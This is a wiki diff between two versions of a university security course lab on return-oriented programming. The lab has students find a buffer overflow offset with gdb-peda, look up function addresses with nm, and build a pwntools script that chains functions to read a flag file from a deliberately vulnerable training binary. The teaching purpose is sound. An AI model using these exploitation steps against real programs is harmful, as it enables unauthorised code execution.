Differences
This shows you the differences between two versions of the page.
|
cns:labs:lab-09 [2020/12/14 14:49] dennis.plosceanu [2. Stack pivoting] |
cns:labs:lab-09 [2022/12/05 13:36] (current) mihai.dumitru2201 [Tasks] |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ====== Lab 09 - Return Oriented Programming (Part 2) ====== | + | ====== Lab 09 - Return-Oriented Programming (Part 2) ====== |
| - | ===== Resources ===== | ||
| - | |||
| - | * [[http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html|More about stack pivoting and creating a "fake stack"]] | ||
| - | |||
| - | ===== Supporting files ===== | ||
| - | |||
| - | You will use this [[http://elf.cs.pub.ro/oss/res/labs/lab-09.tar.gz|lab archive]] throughout the lab. | ||
| - | |||
| - | Please download the lab archive an then unpack it using the commands below: | ||
| - | <code bash> | ||
| - | $ wget http://elf.cs.pub.ro/oss/res/labs/lab-09.tar.gz | ||
| - | $ tar xzf lab-09.tar.gz | ||
| - | </code> | ||
| - | |||
| - | After unpacking, you will get the ''lab-09/'' folder: | ||
| - | <code bash> | ||
| - | $ cd lab-09/ | ||
| - | $ ls -F | ||
| - | flag Makefile task1* task1.c | ||
| - | </code> | ||
| ===== Introduction ===== | ===== Introduction ===== | ||
| Line 49: | Line 29: | ||
| ===== Tasks ===== | ===== Tasks ===== | ||
| + | |||
| + | All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. | ||
| + | |||
| + | |||
| ==== 1. Return to main ==== | ==== 1. Return to main ==== | ||
| - | Inspect the source file ''task1.c''. See if you can spot the vulnerability. | + | Inspect the source file ''ret_to_main.c''. See if you can spot the vulnerability. |
| The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | ||
| Line 59: | Line 43: | ||
| <code asm> | <code asm> | ||
| - | # gdb ./task1 | + | # gdb ./ret_to_main |
| gdb-peda$ pattc 0x40 | gdb-peda$ pattc 0x40 | ||
| 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | ||
| gdb-peda$ r | gdb-peda$ r | ||
| - | Starting program: /cns/lab-11/sol/task1 | + | Starting program: /cns/lab-11/sol/ret_to_main |
| Welcome to our Retired Old Programmers message board! | Welcome to our Retired Old Programmers message board! | ||
| Please leave a message: | Please leave a message: | ||
| Line 115: | Line 99: | ||
| </code> | </code> | ||
| - | Our $rbp is at offset 48 => the return address will be at offset 56. | + | Our ''$rbp'' is at offset 48 => the return address will be at offset 56. |
| === Tutorial: Opening the flag file and returning to main === | === Tutorial: Opening the flag file and returning to main === | ||
| Line 127: | Line 111: | ||
| We'll need to save a few useful addresses: | We'll need to save a few useful addresses: | ||
| <code bash> | <code bash> | ||
| - | # nm task1 | egrep "main|stop|right|there|play" | + | # nm ret_to_main | egrep "main|stop|right|there|play" |
| | | ||
| 00000000004012b5 T main | 00000000004012b5 T main | ||
| Line 143: | Line 127: | ||
| from pwn import * | from pwn import * | ||
| - | io = process('./task1') | + | io = process('./ret_to_main') |
| # Useful values | # Useful values | ||
| Line 173: | Line 157: | ||
| <code bash> | <code bash> | ||
| # ./test.py | # ./test.py | ||
| - | [+] Starting local process './task1': Done | + | [+] Starting local process './ret_to_main': Done |
| [*] Switching to interactive mode | [*] Switching to interactive mode | ||
| -> secret vault opened | -> secret vault opened | ||
| Line 179: | Line 163: | ||
| Please leave a message: | Please leave a message: | ||
| $ | $ | ||
| - | [*] Stopped program './task1' | + | [*] Stopped program './ret_to_main' |
| </code> | </code> | ||
| Line 338: | Line 322: | ||
| Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file. | Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file. | ||
| + | ===== Resources ===== | ||
| + | |||
| + | * [[http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html|More about stack pivoting and creating a "fake stack"]] | ||
